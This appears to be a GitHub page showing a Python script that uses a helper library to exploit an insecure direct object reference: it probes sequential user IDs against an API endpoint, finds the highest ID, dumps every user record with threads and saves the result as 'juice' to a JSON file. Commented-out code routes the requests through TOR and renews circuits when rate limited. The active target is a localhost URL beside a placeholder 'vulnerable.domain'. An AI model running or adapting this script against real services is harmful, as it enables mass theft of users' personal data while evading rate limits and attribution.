-
Notifications
You must be signed in to change notification settings - Fork 4
/
script.py
executable file
·109 lines (79 loc) · 2.65 KB
/
script.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
#!/usr/bin/env python3
from dore import *
from time import sleep
def save(juice, filename='out_dontAdd_.json'):
"""
After you get the juice out, its now your choice to do stuff with it
Hence, This function is not on `dore` :p
"""
with open(filename, 'w') as json_file:
json.dump(
juice,
json_file,
indent=2,
sort_keys=True
)
def exploit(_id):
"""
Make sure one parameter is set to pass id
You may use `match` function :)
If your negative response is matched, then make sure this snippet returns `None` object
"""
url = 'vulnerable.domain/api'
url = 'http://127.0.0.1:3117/user_info'
params = {
'id': _id
}
resp = request( # This is wrapper to `requests.request` with local TOR proxy by default, and other few misc. stuff
url,
params=params,
local=True # This is when, you don't wanna use TOR/proxies
)
if not match('resp_code', resp, 404):
return resp.json()
"""
if not match('json', resp, {'err': 'does not exist'}):
return resp.json()
elif match('resp_code', resp, 429): # Got rate limited, here..
renew()
return exploit(_id)
"""
"""
## Other simple examples of response matching ##
if not match('json', resp, ['err']):
return resp.json()
if not match('regex', resp, '"err"'):
return resp.json()
if not match('regex', resp, 'does not exist'):
return resp.json()
if not match('resp_code', resp, 404):
return resp.json()
"""
if __name__ == '__main__':
print(info(f'Started [at] -> {fetchFormatedTime()}'))
"""
if not is_root(): # You need to be root, for sending a HUP signal to tor
print(info('Yoo -> `renew()` will not work..'))
# Start TOR, if not started yet..
is_active(
'tor.service',
start=True
)
"""
filename = 'juice_dontAdd_.json'
min_id = 1
max_id = get_max_id(exploit, iid=min_id, verbose=0)
# print(max_id)
clear_line()
print(info(f'Now -> Dumping the whole thing from `{min_id}` to `{max_id}`'))
juice = dump_all(exploit, min_id, max_id, threads=2)
clear_line()
# min_id = 70
# max_id = get_max_id(exploit, iid=min_id)
# clear_line()
# print(info(f'Again -> Dumping from second id range ( {min_id} to {max_id} ) now..'))
# juice = dump_all(exploit, min_id, max_id, threads=40)
# clear_line()
print(info(f'Done -> Now, saving it to `{filename}`'))
save(juice, filename)
coolExit()